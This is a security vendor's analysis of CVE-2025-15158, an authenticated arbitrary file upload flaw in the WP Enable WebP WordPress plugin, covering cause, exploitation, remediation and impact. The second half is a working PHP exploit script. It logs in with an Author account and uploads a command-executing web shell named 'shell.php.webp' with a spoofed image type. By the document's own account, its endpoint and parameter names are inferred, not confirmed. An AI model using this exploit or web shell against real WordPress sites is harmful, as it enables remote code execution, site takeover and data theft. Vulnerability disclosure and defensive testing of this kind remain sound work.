Atomic Edge analysis of CVE-2025-15158 (metadata-based):
This vulnerability is an arbitrary file upload flaw in the WP Enable WebP WordPress plugin version 1.0. The vulnerability resides in the ‘wpse_file_and_ext_webp’ function. It allows authenticated attackers with Author-level privileges or higher to upload files with dangerous extensions, potentially leading to remote code execution. The CVSS score of 8.8 reflects a high-severity network-accessible attack with low attack complexity.
Atomic Edge research infers the root cause is improper file type validation, consistent with CWE-434. The plugin likely accepts file uploads via an AJAX handler or admin POST request. It fails to properly verify the file’s extension or MIME type before moving it to a web-accessible directory. These conclusions are inferred from the CWE classification and standard WordPress plugin patterns, as no source code diff is available for confirmation.
Exploitation requires an attacker to possess an Author-level WordPress account. The attacker would send a POST request to a plugin-specific AJAX endpoint, such as ‘/wp-admin/admin-ajax.php’. The request would use an action parameter like ‘wpse_file_and_ext_webp’ or a derivative. The payload includes a malicious file, such as a PHP web shell, with a double extension like ‘shell.php.webp’ or a spoofed Content-Type header to bypass weak validation. The uploaded file would be placed in a predictable location like the WordPress uploads directory.
Effective remediation requires implementing strict server-side validation of both file extension and MIME type. A whitelist of allowed file types, specifically only WebP images, should be enforced. The plugin should also verify file signatures (magic bytes) and implement proper file naming conventions to prevent overwrites. WordPress nonce and capability checks must also be present and correctly validated for the upload function.
Successful exploitation grants an attacker the ability to upload arbitrary files, including PHP scripts, to the server. This directly leads to remote code execution with the web server’s privileges. An attacker can compromise the entire site, deface pages, steal data, establish a persistent backdoor, or use the server as a pivot point for network attacks. The impact is complete loss of confidentiality, integrity, and availability.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-15158 - WP Enable WebP <= 1.0 - Authenticated (Author+) Arbitrary File Upload
<?php
/**
* Proof of Concept for CVE-2025-15158.
* Assumptions based on metadata:
* 1. The vulnerable endpoint is an AJAX handler via admin-ajax.php.
* 2. The vulnerable parameter/action is derived from the function name 'wpse_file_and_ext_webp'.
* 3. Author-level authentication (cookie) is required.
* 4. The plugin does not properly validate file type or extension.
*/
$target_url = 'http://vulnerable-site.com/wp-admin/admin-ajax.php';
$username = 'author_user';
$password = 'author_pass';
// Step 1: Authenticate to obtain session cookies.
$login_url = str_replace('/wp-admin/admin-ajax.php', '/wp-login.php', $target_url);
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $login_url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query([
'log' => $username,
'pwd' => $password,
'wp-submit' => 'Log In',
'redirect_to' => $target_url,
'testcookie' => '1'
]),
CURLOPT_RETURNTRANSFER => true,
CURLOPT_COOKIEJAR => 'cookies.txt',
CURLOPT_COOKIEFILE => 'cookies.txt',
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_HEADER => true
]);
$login_response = curl_exec($ch);
// Step 2: Construct the malicious file upload request.
// The action parameter is inferred from the vulnerable function name.
$malicious_file_content = '<?php echo "CVE-2025-15158 Test"; if(isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';
$file_path = '/tmp/exploit.php.webp';
file_put_contents($file_path, $malicious_file_content);
$post_fields = [
'action' => 'wpse_file_and_ext_webp', // Inferred AJAX action
'file_upload_param' => new CURLFile($file_path, 'image/webp', 'shell.php.webp') // Parameter name is assumed
];
curl_setopt_array($ch, [
CURLOPT_URL => $target_url,
CURLOPT_POSTFIELDS => $post_fields,
CURLOPT_HTTPHEADER => []
]);
$upload_response = curl_exec($ch);
curl_close($ch);
// Step 3: Check response and attempt to locate uploaded file.
echo "Login and upload attempted.n";
echo "Response (first 500 chars): " . substr($upload_response, 0, 500) . "n";
// The exact location of the uploaded file is unknown without code analysis.
// An attacker would brute-force common upload directories.
?>
